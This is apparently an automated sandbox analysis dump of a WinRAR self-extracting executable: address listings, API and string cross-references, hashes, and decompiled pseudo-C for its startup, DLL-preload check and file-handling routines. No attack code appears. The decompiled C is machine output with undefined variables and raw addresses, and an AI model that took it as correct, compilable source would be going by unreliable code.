0x00000000
0x00000000
0x0027aed1
0x0027aeb9
0x0027aec0
0x00000000
0x00000000
0x00000000
0x0027af01
0x0027af01
0x0027af02
0x0027af02
0x0027af0a
0x0027af24
0x0027af29
0x00000000
0x0027add1
0x0027add1
0x0027add3
0x0027add9
0x0027adda
0x0027addf
0x0027ade4
0x0027ade6
0x0027ade8
0x0027adef
0x0027adf1
0x0027ae05
0x0027ae10
0x0027ae15
0x0027ae15
0x0027adef
0x0027ae16
0x0027ae1c
0x0027ae6f
0x0027ae6f
0x0027ae70
0x0027ae76
0x0027ae77
0x00000000
0x0027ae1e
0x0027ae1f
0x0027ae25
0x0027ae2b
0x00000000
0x00000000
0x0027ae2d
0x0027ae34
0x00000000
0x00000000
0x0027ae36
0x0027ae38
0x0027ae3e
0x0027ae3f
0x0027ae44
0x0027ae4b
0x00000000
0x00000000
0x0027ae61
0x0027ae67
0x0027ae69
0x0027a75d
0x0027a75d
0x0027a763
0x0027a763
0x0027a687
0x0027a688
0x0027afa4
0x0027afa4
0x0027afa6
0x0027afac
0x0027afb6
0x0027afb6
0x00000000
0x0027ae69
0x0027ae1c
0x0027adcb
0x0027a61d
0x0027a620
0x0027a634
0x0027a634
0x00000000
0x0027a634
0x0027a625
0x0027a625
0x0027a628
0x0027a693
0x0027a69a
0x0027a732
0x0027a732
0x0027a742
0x0027a748
0x0027a74f
0x0027a769
0x0027a770
0x0027a784
0x0027a78a
0x0027a791
0x0027a793
0x0027a7a5
0x0027a7b4
0x0027a7b6
0x0027a7b6
0x0027a7bc
0x0027a7c2
0x0027a7c9
0x0027a7e6
0x0027a7f3
0x0027a816
0x0027a81b
0x0027a81e
0x0027a7cb
0x0027a7d0
0x0027a7d0
0x0027a827
0x0027a82c
0x0027a833
0x0027a83c
0x0027a83c
0x0027a841
0x0027a84b
0x0027a84c
0x0027a84f
0x0027a85c
0x0027a85d
0x0027a85f
0x0027a872
0x0027a87e
0x0027a880
0x0027a883
0x0027a885
0x0027a898
0x0027a898
0x0027a89b
0x0027a89b
0x0027a8a1
0x0027a8a3
0x0027a912
0x0027a912
0x0027a916
0x0027ab5a
0x0027ab60
0x0027ab6a
0x0027ab82
0x0027ab88
0x0027ab95
0x0027aba0
0x0027aba2
0x0027aba4
0x0027abaf
0x0027abaf
0x0027abb8
0x0027abb8
0x0027abbe
0x0027abc0
0x0027abc6
0x0027abc7
0x0027abcc
0x0027abce
0x0027abd4
0x0027abd5
0x0027abda
0x0027abdf
0x0027abe0
0x0027abe6
0x0027abeb
0x0027abed
0x0027abf3
0x0027abfa
0x0027abfb
0x0027ac00
0x0027ac07
0x0027ac09
0x0027ac10
0x0027ac12
0x0027ac19
0x0027ac1b
0x0027ac1d
0x0027ac23
0x0027ac24
0x0027ac24
0x0027ac19
0x0027ac10
0x0027ac2c
0x0027ac31
0x0027ac31
0x0027ac38
0x00000000
0x0027ac38
0x0027a91c
0x0027a923
0x0027a923
0x0027a926
0x0027a926
0x0027a928
0x0027a92c
0x0027a92e
0x0027aaf0
0x0027aaf0
0x0027aaf4
0x0027ab04
0x0027ab1d
0x0027ab2b
0x0027ab45
0x0027ab4a
0x0027ab4a
0x0027a685
0x0027a685
0x00000000
0x0027a685
0x0027a942
0x0027a953
0x0027a959
0x0027a95e
0x0027a97b
0x0027a980
0x0027a983
0x0027a990
0x0027a997
0x0027a9a0
0x0027a9b8
0x0027a9bb
0x0027a9c2
0x0027a9c5
0x0027a9c8
0x0027a9d5
0x0027a9d7
0x0027a9da
0x0027a9dc
0x0027aa67
0x0027a9e2
0x0027a9e2
0x0027a9e9
0x0027a9ef
0x0027a9f1
0x0027a9fe
0x0027a9fe
0x0027aa0a
0x0027aa16
0x0027aa22
0x0027aa2d
0x0027aa34
0x0027aa39
0x0027aa57
0x0027aa5a
0x0027aa5f
0x0027aa5f
0x0027aa6e
0x0027aa82
0x0027aa93
0x0027aa98
0x0027aa9a
0x0027aad4
0x0027aad7
0x00000000
0x0027aa9c
0x0027aaa4
0x0027aaaa
0x0027aaaa
0x0027aaaa
0x0027aaae
0x0027aab1
0x0027aab1
0x0027aab4
0x00000000
0x00000000
0x0027aab8
0x0027aac1
0x0027aac2
0x0027aac5
0x0027aac8
0x00000000
0x00000000
0x00000000
0x0027aac8
0x0027aacd
0x0027aada
0x0027aada
0x0027aade
0x0027aae1
0x0027aaea
0x0027aaea
0x00000000
0x0027aade
0x0027aa9a
0x0027a8a5
0x0027a8a7
0x00000000
0x00000000
0x0027a8c1
0x0027a8c6
0x0027a8cf
0x0027a8d4
0x0027a8de
0x0027a8e0
0x0027a8e7
0x0027a8ec
0x0027a8ef
0x0027a8f1
0x0027a8f3
0x0027a8f5
0x0027a8f8
0x0027a8fa
0x0027a8fa
0x0027a8f8
0x0027a8fd
0x0027a8fd
0x0027a8fd
0x0027a907
0x0027a90c
0x00000000
0x0027a90c
0x0027a887
0x0027a889
0x0027a88c
0x0027a88f
0x00000000
0x00000000
0x0027a891
0x0027a893
0x00000000
0x0027a861
0x0027a861
0x0027a863
0x0027a866
0x0027a86d
0x0027a86f
0x00000000
0x0027a86f
0x0027a868
0x0027a86b
0x00000000
0x00000000
0x00000000
0x0027a86b
0x0027a772
0x0027a774
0x0027a775
0x0027a777
0x0027ac3d
0x0027ac3d
0x0027ac44
0x00000000
0x00000000
0x0027ac4a
0x0027ac4c
0x00000000
0x00000000
0x0027ac57
0x0027ac65
0x0027ac6b
0x0027ac71
0x0027ac74
0x0027ac7f
0x0027ac89
0x0027ac89
0x0027ac8e
0x0027ac91
0x0027ac76
0x0027ac76
0x0027ac76
0x0027ac9a
0x0027aca8
0x00000000
0x0027aca8
0x0027a770
0x0027a753
0x0027a754
0x0027a75b
0x00000000
0x00000000
0x00000000
0x0027a75b
0x0027a6a0
0x0027a6a7
0x00000000
0x0027a6ad
0x0027a6ad
0x0027a6b4
0x0027a6b9
0x0027a6bb
0x0027a6ca
0x0027a6d2
0x0027a6d5
0x0027a724
0x0027a724
0x0027a72b
0x0027a72d
0x0027a72d
0x0027a6dd
0x0027a6e4
0x00000000
0x00000000
0x0027a6f3
0x0027a6f9
0x0027a6fb
0x00000000
0x0027a701
0x0027a706
0x0027a70c
0x0027a70e
0x0027a714
0x0027a71e
0x0027a71e
0x00000000
0x0027a70e
0x0027a6fb
0x00000000
0x0027a724
0x0027a6a7
0x0027a62a
0x0027a62a
0x0027a62d
0x0027a668
0x0027a669
0x0027a670
0x0027a676
0x00000000
0x00000000
0x0027a678
0x0027a67f
0x00000000
0x00000000
0x00000000
0x0027a67f
0x0027a62f
0x0027a632
0x0027a64b
0x0027a650
0x0027a652
0x0027a65e
0x0027a65e
0x00000000
0x0027a652
0x00000000
0x0027a632
0x0027a609
0x0027a60b
0x00000000

APIs

__EH_prolog.LIBCMT ref: 0027A5D6

Part of subcall function 002612D7: GetDlgItem.USER32(00000000,00003021), ref: 0026131B
Part of subcall function 002612D7: SetWindowTextW.USER32(00000000,002922E4), ref: 00261331

Strings

-el -s2 "-d%s" "-sp%s", xrefs: 0027A96A
"%s"%s, xrefs: 0027AB0C
<, xrefs: 0027A983
__tmp_rar_sfx_access_check_%u, xrefs: 0027A8B0
C:\Windows\system32, xrefs: 0027A9C8
STARTDLG, xrefs: 0027A5F5
winrarsfxmappingfile.tmp, xrefs: 0027A9A5
@, xrefs: 0027A990
,>), xrefs: 0027A9BB
LICENSEDLG, xrefs: 0027AE56

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prologItemTextWindow
String ID: "%s"%s$,>)$-el -s2 "-d%s" "-sp%s"$<$@$C:\Windows\system32$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
API String ID: 810644672-3259139136
Opcode ID: 0eb0f4c2a70ffa9353adae77d6334d5f69947eb8218e5d8b35531973161f0a60
Instruction ID: f6758734be20dd400da5a57069e0cb76f98d32a51760dfc09d7f9ca796c190d9
Opcode Fuzzy Hash: 0eb0f4c2a70ffa9353adae77d6334d5f69947eb8218e5d8b35531973161f0a60
Instruction Fuzzy Hash: 0842F571964305BFEB219F60AC8EFBE3B6CAB42710F448055FA09A60D1DB745DA4CF62

Uniqueness

Uniqueness Score: -1.00%

Function 0026FD49, Relevance: 100.1, APIs: 22, Strings: 35, Instructions: 314
libraryfileloaderCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E0026FD49(void* __edx, char _a3, long _a4, CHAR* _a8, CHAR* _a12, CHAR* _a16, CHAR* _a20, CHAR* _a24, CHAR* _a28, CHAR* _a32, CHAR* _a36, CHAR* _a40, CHAR* _a44, CHAR* _a48, CHAR* _a52, CHAR* _a56, CHAR* _a60, CHAR* _a64, CHAR* _a68, CHAR* _a72, CHAR* _a76, CHAR* _a80, CHAR* _a84, CHAR* _a88, CHAR* _a92, CHAR* _a96, CHAR* _a100, CHAR* _a104, CHAR* _a108, CHAR* _a112, CHAR* _a116, CHAR* _a120, CHAR* _a124, CHAR* _a128, CHAR* _a132, CHAR* _a136, CHAR* _a140, CHAR* _a144, CHAR* _a148, CHAR* _a152, CHAR* _a156, CHAR* _a160, CHAR* _a164, CHAR* _a168, CHAR* _a172, CHAR* _a176, CHAR* _a180, CHAR* _a184, CHAR* _a188, CHAR* _a192, CHAR* _a196, CHAR* _a200, CHAR* _a204, CHAR* _a208, CHAR* _a212, CHAR* _a216, CHAR* _a220, CHAR* _a224, CHAR* _a228, CHAR* _a232, CHAR* _a236, CHAR* _a240, CHAR* _a244, char _a248, char _a252, short _a756, short _a760, char _a768, short _a772, char _a4848, char _a4852, void _a4860, char _a4864, short _a4868, char _a9152, char _a9160, void _a13260, signed char _a46032) {
				char _v1;
				long _v4;
				char* _t118;
				void* _t126;
				int _t130;
				long _t141;
				int _t167;
				_Unknown_base(*)()* _t176;
				_Unknown_base(*)()* _t177;
				signed char _t184;
				struct _SECURITY_ATTRIBUTES* _t195;
				long _t197;
				void* _t198;
				struct HINSTANCE__* _t201;
				signed int _t203;
				signed int _t205;
				void* _t206;
				signed int _t207;
				int _t208;
				void* _t210;

				E0027D940();
				_push(_t207);
				_a3 = 0;
				_t201 = GetModuleHandleW(L"kernel32");
				if(_t201 == 0) {
					L5:
					_t118 =  *0x29d080; // 0x292884
					_t208 = _t207 | 0xffffffff;
					_t202 = 0x800;
					_a8 = L"version.dll";
					_a12 = L"DXGIDebug.dll";
					_a16 = L"sfc_os.dll";
					_a20 = L"SSPICLI.DLL";
					_a24 = L"rsaenh.dll";
					_a28 = L"UXTheme.dll";
					_a32 = L"dwmapi.dll";
					_a36 = L"cryptbase.dll";
					_a40 = L"lpk.dll";
					_a44 = L"usp10.dll";
					_a48 = L"clbcatq.dll";
					_a52 = L"comres.dll";
					_a56 = L"ws2_32.dll";
					_a60 = L"ws2help.dll";
					_a64 = L"psapi.dll";
					_a68 = L"ieframe.dll";
					_a72 = L"ntshrui.dll";
					_a76 = L"atl.dll";
					_a80 = L"setupapi.dll";
					_a84 = L"apphelp.dll";
					_a88 = L"userenv.dll";
					_a92 = L"netapi32.dll";
					_a96 = L"shdocvw.dll";
					_a100 = L"crypt32.dll";
					_a104 = L"msasn1.dll";
					_a108 = L"cryptui.dll";
					_a112 = L"wintrust.dll";
					_a116 = L"shell32.dll";
					_a120 = L"secur32.dll";
					_a124 = L"cabinet.dll";
					_a128 = L"oleaccrc.dll";
					_a132 = L"ntmarta.dll";
					_a136 = L"profapi.dll";
					_a140 = L"WindowsCodecs.dll";
					_a144 = L"srvcli.dll";
					_a148 = L"cscapi.dll";
					_a152 = L"slc.dll";
					_a156 = L"imageres.dll";
					_a160 = L"dnsapi.DLL";
					_a164 = L"iphlpapi.DLL";
					_a168 = L"WINNSI.DLL";
					_a172 = L"netutils.dll";
					_a176 = L"mpr.dll";
					_a180 = L"devrtl.dll";
					_a184 = L"propsys.dll";
					_a188 = L"mlang.dll";
					_a192 = L"samcli.dll";
					_a196 = L"samlib.dll";
					_a200 = L"wkscli.dll";
					_a204 = L"dfscli.dll";
					_a208 = L"browcli.dll";
					_a212 = L"rasadhlp.dll";
					_a216 = L"dhcpcsvc6.dll";
					_a220 = L"dhcpcsvc.dll";
					_a224 = L"XmlLite.dll";
					_a228 = L"linkinfo.dll";
					_a232 = L"cryptsp.dll";
					_a236 = L"RpcRtRemote.dll";
					_a240 = L"aclui.dll";
					_a244 = L"dsrole.dll";
					_a248 = L"peerdist.dll";
					if( *_t118 == 0x78) {
						L14:
						GetModuleFileNameW(0,  &_a772, _t202);
						E0026FAB1( &_a9160, E0026B943(_t223,  &_a772), _t202);
						_t195 = 0;
						_t203 = 0;
						do {
							if(E0026A995() < 0x600) {
								_t126 = 0;
								__eflags = 0;
							} else {
								_t126 = E0026FCFD( *((intOrPtr*)(_t210 + 0x18 + _t203 * 4))); // executed
							}
							if(_t126 == 0) {
								L20:
								_push(0x800);
								E0026B9B9(_t227,  &_a772,  *((intOrPtr*)(_t210 + 0x1c + _t203 * 4)));
								_t130 = GetFileAttributesW( &_a760);
								if(_t130 != _t208) {
									_t195 =  *((intOrPtr*)(_t210 + 0x18 + _t203 * 4));
									L24:
									if(_v1 != 0) {
										L30:
										_t234 = _t195;
										if(_t195 == 0) {
											return _t130;
										}
										E0026B98D(_t234,  &_a768);
										if(E0026A995() < 0x600) {
											_push( &_a9160);
											_push( &_a768);
											E00263E41( &_a4864, 0x864, L"Please remove %s from %s folder. It is unsecure to run %s until it is done.", _t195);
											_t210 = _t210 + 0x18;
											_t130 = AllocConsole();
											__eflags = _t130;
											if(_t130 != 0) {
												__imp__AttachConsole(GetCurrentProcessId());
												_t141 = E00282B33( &_a4860);
												WriteConsoleW(GetStdHandle(0xfffffff4),  &_a4860, _t141,  &_v4, 0);
												Sleep(0x2710);
												_t130 = FreeConsole();
											}
										} else {
											E0026FCFD(L"dwmapi.dll");
											E0026FCFD(L"uxtheme.dll");
											_push( &_a9152);
											_push( &_a760);
											E00263E41( &_a4852, 0x864, E0026DA42(_t185, 0xf1), _t195);
											_t210 = _t210 + 0x18;
											_t130 = E00279735(0,  &_a4848, E0026DA42(_t185, 0xf0), 0x30);
										}
										ExitProcess(0);
									}
									_t205 = 0;
									while(1) {
										_push(0x800);
										E0026B9B9(0,  &_a768,  *((intOrPtr*)(_t210 + 0x3c + _t205 * 4)));
										_t130 = GetFileAttributesW( &_a756);
										if(_t130 != _t208) {
											break;
										}
										_t205 = _t205 + 1;
										if(_t205 < 0x35) {
											continue;
										}
										goto L30;
									}
									_t195 =  *((intOrPtr*)(_t210 + 0x38 + _t205 * 4));
									goto L30;
								}
							} else {
								_t86 = _t203 * 4; // 0x292920
								_t130 = CompareStringW(0x400, 0x1001,  *(_t210 + _t86 + 0x24), _t208, L"DXGIDebug.dll", _t208); // executed
								_t227 = _t130 - 2;
								if(_t130 != 2) {
									goto L21;
								}
								goto L20;
							}
							L21:
							_t203 = _t203 + 1;
						} while (_t203 < 8);
						goto L24;
					}
					_t197 = E00286662(_t185, _t118);
					_pop(_t185);
					if(_t197 == 0) {
						goto L14;
					}
					GetModuleFileNameW(0,  &_a4868, 0x800);
					_t206 = CreateFileW( &_a4868, 0x80000000, 1, 0, 3, 0, 0);
					if(_t206 == _t208 || SetFilePointer(_t206, _t197, 0, 0) != _t197) {
						L13:
						CloseHandle(_t206);
						_t202 = 0x800;
						goto L14;
					} else {
						_t167 = ReadFile(_t206,  &_a13260, 0x7ffe,  &_a4, 0);
						_t222 = _t167;
						if(_t167 == 0) {
							goto L13;
						}
						_t185 = 0;
						_push(0x104);
						 *((short*)(_t210 + 0x33e0 + (_a4 >> 1) * 2)) = 0;
						_push( &_a252);
						_push( &_a13260);
						while(1) {
							_t198 = E0026F835(_t222);
							_t223 = _t198;
							if(_t198 == 0) {
								goto L13;
							}
							E0026FCFD( &_a252);
							_push(0x104);
							_push( &_a248);
							_push(_t198);
						}
						goto L13;
					}
				}
				_t176 = GetProcAddress(_t201, "SetDllDirectoryW");
				_t184 = _a46032;
				if(_t176 != 0) {
					asm("sbb ecx, ecx");
					_t185 =  ~(_t184 & 0x000000ff) & 0x002922e4;
					 *_t176( ~(_t184 & 0x000000ff) & 0x002922e4);
				}
				_t177 = GetProcAddress(_t201, "SetDefaultDllDirectories");
				if(_t177 != 0) {
					_t185 = ((_t184 == 0x00000000) - 0x00000001 & 0xfffff800) + 0x1000;
					 *_t177(((_t184 == 0x00000000) - 0x00000001 & 0xfffff800) + 0x1000);
					_v1 = 1;
				}
				goto L5;
			}

0x0026fd4e
0x0026fd54
0x0026fd5c
0x0026fd67
0x0026fd6b
0x0026fdbe
0x0026fdbe
0x0026fdc3
0x0026fdcc
0x0026fdd1
0x0026fdd9
0x0026fde4
0x0026fdec
0x0026fdf4
0x0026fdfc
0x0026fe04
0x0026fe0c
0x0026fe14
0x0026fe1c
0x0026fe24
0x0026fe2c
0x0026fe34
0x0026fe3c
0x0026fe44
0x0026fe4c
0x0026fe54
0x0026fe5c
0x0026fe64
0x0026fe6c
0x0026fe74
0x0026fe7c
0x0026fe84
0x0026fe8c
0x0026fe94
0x0026fe9c
0x0026fea4
0x0026feaf
0x0026feba
0x0026fec5
0x0026fed0
0x0026fedb
0x0026fee6
0x0026fef1
0x0026fefc
0x0026ff07
0x0026ff12
0x0026ff1d
0x0026ff28
0x0026ff33
0x0026ff3e
0x0026ff49
0x0026ff54
0x0026ff5f
0x0026ff6a
0x0026ff75
0x0026ff80
0x0026ff8b
0x0026ff96
0x0026ffa1
0x0026ffac
0x0026ffb7
0x0026ffc2
0x0026ffcd
0x0026ffd8
0x0026ffe3
0x0026ffee
0x0026fff9
0x00270004
0x0027000f
0x0027001a
0x00270025
0x002700f3
0x002700fe
0x00270117
0x00270122
0x00270124
0x00270126
0x00270130
0x0027013d
0x0027013d
0x00270132
0x00270136
0x00270136
0x00270141
0x00270163
0x00270163
0x00270174
0x00270181
0x00270185
0x0027018f
0x00270193
0x00270198
0x002701cc
0x002701cc
0x002701ce
0x002702e5
0x002702e5
0x002701dc
0x002701eb
0x0027025a
0x00270262
0x00270276
0x0027027b
0x0027027e
0x00270284
0x00270286
0x0027028f
0x002702a4
0x002702bc
0x002702c7
0x002702cd
0x002702cd
0x002701ed
0x002701f2
0x002701fc
0x00270208
0x00270210
0x0027022a
0x0027022f
0x00270249
0x00270249
0x002702d5
0x002702d5
0x0027019a
0x0027019c
0x0027019c
0x002701ad
0x002701ba
0x002701be
0x00000000
0x00000000
0x002701c0
0x002701c4
0x00000000
0x00000000
0x00000000
0x002701c6
0x002701c8
0x00000000
0x002701c8
0x00270143
0x0027014a
0x00270158
0x0027015e
0x00270161
0x00000000
0x00000000
0x00000000
0x00270161
0x00270187
0x00270187
0x00270188
0x00000000
0x0027018d
0x00270031
0x00270033
0x00270036
0x00000000
0x00000000
0x00270047
0x00270065
0x00270069
0x002700e7
0x002700e8
0x002700ee
0x00000000
0x0027007b
0x00270090
0x00270096
0x00270098
0x00000000
0x00000000
0x002700a0
0x002700a2
0x002700a7
0x002700b6
0x002700be
0x002700dc
0x002700e1
0x002700e3
0x002700e5
0x00000000
0x00000000
0x002700c9
0x002700ce
0x002700da
0x002700db
0x002700db
0x00000000
0x002700dc
0x00270069
0x0026fd79
0x0026fd7b
0x0026fd84
0x0026fd8b
0x0026fd8d
0x0026fd94
0x0026fd94
0x0026fd9c
0x0026fda0
0x0026fdb0
0x0026fdb7
0x0026fdb9
0x0026fdb9
0x00000000

APIs

GetModuleHandleW.KERNEL32 ref: 0026FD61
GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0026FD79
GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 0026FD9C
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00270047
CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0027005F
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00270071
ReadFile.KERNEL32(00000000,?,00007FFE,002928D4,00000000), ref: 00270090
CloseHandle.KERNEL32(00000000), ref: 002700E8
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 002700FE
CompareStringW.KERNELBASE(00000400,00001001, )),?,DXGIDebug.dll,?,?,00000000,?,00000800), ref: 00270158
GetFileAttributesW.KERNEL32(?,?,002928EC,00000800,?,00000000,?,00000800), ref: 00270181
GetFileAttributesW.KERNEL32(?,?,002929AC,00000800), ref: 002701BA

Part of subcall function 0026FCFD: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 0026FD18
Part of subcall function 0026FCFD: LoadLibraryW.KERNEL32(?,?,?,?,00000800,?,0026E7F6,Crypt32.dll,?,0026E878,?,0026E85C,?,?,?,?), ref: 0026FD3A

_swprintf.LIBCMT ref: 0027022A
_swprintf.LIBCMT ref: 00270276

Part of subcall function 00263E41: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00263E54

AllocConsole.KERNEL32 ref: 0027027E
GetCurrentProcessId.KERNEL32 ref: 00270288
AttachConsole.KERNEL32(00000000), ref: 0027028F
GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 002702B5
WriteConsoleW.KERNEL32 ref: 002702BC
Sleep.KERNEL32(00002710), ref: 002702C7
FreeConsole.KERNEL32 ref: 002702CD
ExitProcess.KERNEL32 ref: 002702D5

Strings

(,), xrefs: 0026FF07
P,), xrefs: 0026FF1D
l,), xrefs: 0026FF28
uxtheme.dll, xrefs: 002701F7
t.), xrefs: 0027000F
P)), xrefs: 0026FDFC
X+), xrefs: 0026FEAF
p+), xrefs: 0026FEBA
@,), xrefs: 0026FF12
X-), xrefs: 0026FF96
DXGIDebug.dll, xrefs: 00270144
8)), xrefs: 0026FDF4
t*), xrefs: 0026FE64
L*), xrefs: 0026FE54
+), xrefs: 0026FEF1
kernel32, xrefs: 0026FD57
SetDllDirectoryW, xrefs: 0026FD73
@.), xrefs: 0026FFF9
h)), xrefs: 0026FE04
,), xrefs: 0026FF5F
<+), xrefs: 0026FEA4
(), xrefs: 0026FDD9
4*), xrefs: 0026FE4C
*), xrefs: 0026FE44
)), xrefs: 0027014A
dwmapi.dll, xrefs: 002701ED
Please remove %s from %s folder. It is unsecure to run %s until it is done., xrefs: 00270264
p-), xrefs: 0026FFA1
(-), xrefs: 0026FF80
SetDefaultDllDirectories, xrefs: 0026FD96
(.), xrefs: 0026FFEE
@-), xrefs: 0026FF8B
d*), xrefs: 0026FE5C
`.), xrefs: 00270004
$+), xrefs: 0026FE9C

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l
String ID: ))$ *)$$+)$(,)$(-)$(.)$4*)$8))$<+)$@,)$@-)$@.)$DXGIDebug.dll$L*)$P))$P,)$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$X+)$X-)$`.)$d*)$dwmapi.dll$h))$kernel32$l,)$p+)$p-)$t*)$t.)$uxtheme.dll$()$+)$,)
API String ID: 1201351596-176225157
Opcode ID: 7857398c157521b36b7f4d1603c4eccd1c85c653e0cc0554bfcee07a0c493ed6
Instruction ID: 0d019c2e3e787e151e1727e67fd8cc37b1882d1219b8f9632fe694a6527e4e10
Opcode Fuzzy Hash: 7857398c157521b36b7f4d1603c4eccd1c85c653e0cc0554bfcee07a0c493ed6
Instruction Fuzzy Hash: BDD16DB1029385FADB31DF50D889B9FBBE8BF85704F50481DE58896250DBB0956CCFA2

Uniqueness

Uniqueness Score: -1.00%

Function 0027B4C7, Relevance: 31.9, APIs: 14, Strings: 4, Instructions: 438
windowfileCOMMON

Download Yara Rule

C-Code - Quality: 49%

			E0027B4C7(void* __edx) {
				intOrPtr _t215;
				void* _t220;
				intOrPtr _t278;
				void* _t291;
				WCHAR* _t293;
				void* _t296;
				WCHAR* _t297;
				void* _t302;

				_t291 = __edx;
				E0027D870(E0029150B, _t302);
				_t215 = 0x1bc80;
				E0027D940();
				if( *((intOrPtr*)(_t302 + 0xc)) == 0) {
					L169:
					 *[fs:0x0] =  *((intOrPtr*)(_t302 - 0xc));
					return _t215;
				}
				_push(0x1000);
				_push(_t302 - 0xe);
				_push(_t302 - 0xd);
				_push(_t302 - 0x5c84);
				_push(_t302 - 0xfc8c);
				_push( *((intOrPtr*)(_t302 + 0xc)));
				_t215 = E0027A156();
				 *((intOrPtr*)(_t302 + 0xc)) = 0x1bc80;
				if(0x1bc80 != 0) {
					_t278 =  *((intOrPtr*)(_t302 + 0x10));
					do {
						_t220 = _t302 - 0x5c84;
						_t296 = _t302 - 0x1bc8c;
						_t293 = 6;
						goto L4;
						L6:
						while(E00271410(_t302 - 0xfc8c,  *((intOrPtr*)(0x29d618 + _t297 * 4))) != 0) {
							_t297 =  &(_t297[0]);
							if(_t297 < 0xe) {
								continue;
							} else {
								goto L167;
							}
						}
						if(_t297 > 0xd) {
							goto L167;
						}
						switch( *((intOrPtr*)(_t297 * 4 +  &M0027C0D7))) {
							case 0:
								__eflags = _t278 - 2;
								if(_t278 != 2) {
									goto L167;
								}
								_t299 = 0x800;
								E002795F8(_t302 - 0x7c84, 0x800);
								E0026A188(E0026B625(_t302 - 0x7c84, _t302 - 0x5c84, _t302 - 0xdc8c, 0x800), _t278, _t302 - 0x8c8c, 0x800);
								 *(_t302 - 4) = _t293;
								E0026A2C2(_t302 - 0x8c8c, _t302 - 0xdc8c);
								E00266EF9(_t302 - 0x3c84);
								_push(_t293);
								_t286 = _t302 - 0x8c8c;
								_t238 = E0026A215(_t302 - 0x8c8c, _t291, _t302 - 0x3c84);
								__eflags = _t238;
								if(_t238 == 0) {
									L28:
									 *(_t302 - 4) =  *(_t302 - 4) | 0xffffffff;
									E0026A19E(_t302 - 0x8c8c);
									goto L167;
								} else {
									goto L15;
									L16:
									E0026B1B7(_t286, __eflags, _t302 - 0x7c84, _t302 - 0x103c, _t299);
									E0026AEA5(__eflags, _t302 - 0x103c, _t299);
									_t301 = E00282B33(_t302 - 0x7c84);
									__eflags = _t301 - 4;
									if(_t301 < 4) {
										L18:
										_t266 = E0026B5E5(_t302 - 0x5c84);
										__eflags = _t266;
										if(_t266 != 0) {
											goto L28;
										}
										L19:
										_t268 = E00282B33(_t302 - 0x3c84);
										__eflags = 0;
										 *((short*)(_t302 + _t268 * 2 - 0x3c82)) = 0;
										E0027E920(_t293, _t302 - 0x3c, _t293, 0x1e);
										_t304 = _t304 + 0x10;
										 *((intOrPtr*)(_t302 - 0x38)) = 3;
										_push(0x14);
										_pop(_t271);
										 *((short*)(_t302 - 0x2c)) = _t271;
										 *((intOrPtr*)(_t302 - 0x34)) = _t302 - 0x3c84;
										_push(_t302 - 0x3c);
										 *0x29def4();
										goto L20;
									}
									_t276 = E00282B33(_t302 - 0x103c);
									__eflags = _t301 - _t276;
									if(_t301 > _t276) {
										goto L19;
									}
									goto L18;
									L20:
									_t243 = GetFileAttributesW(_t302 - 0x3c84);
									__eflags = _t243 - 0xffffffff;
									if(_t243 == 0xffffffff) {
										L27:
										_push(_t293);
										_t286 = _t302 - 0x8c8c;
										_t245 = E0026A215(_t302 - 0x8c8c, _t291, _t302 - 0x3c84);
										__eflags = _t245;
										if(_t245 != 0) {
											_t299 = 0x800;
											L15:
											SetFileAttributesW(_t302 - 0x3c84, _t293);
											__eflags =  *((char*)(_t302 - 0x2c78));
											if(__eflags == 0) {
												goto L20;
											}
											goto L16;
										}
										goto L28;
									}
									_t247 = DeleteFileW(_t302 - 0x3c84);
									__eflags = _t247;
									if(_t247 != 0) {
										goto L27;
									} else {
										_t300 = _t293;
										_push(_t293);
										goto L24;
										L24:
										E00263E41(_t302 - 0x103c, 0x800, L"%s.%d.tmp", _t302 - 0x3c84);
										_t304 = _t304 + 0x14;
										_t252 = GetFileAttributesW(_t302 - 0x103c);
										__eflags = _t252 - 0xffffffff;
										if(_t252 != 0xffffffff) {
											_t300 = _t300 + 1;
											__eflags = _t300;
											_push(_t300);
											goto L24;
										} else {
											_t255 = MoveFileW(_t302 - 0x3c84, _t302 - 0x103c);
											__eflags = _t255;
											if(_t255 != 0) {
												MoveFileExW(_t302 - 0x103c, _t293, 4);
											}
											goto L27;
										}
									}
								}
							case 1:
								__eflags = __ebx;
								if(__ebx == 0) {
									__eax = E00282B33(__esi);
									__eax = __eax + __edi;
									_push(__eax);
									_push( *0x2bce0c);
									__eax = E00282B5E(__ecx, __edx);
									__esp = __esp + 0xc;
									__eflags = __eax;
									if(__eax != 0) {
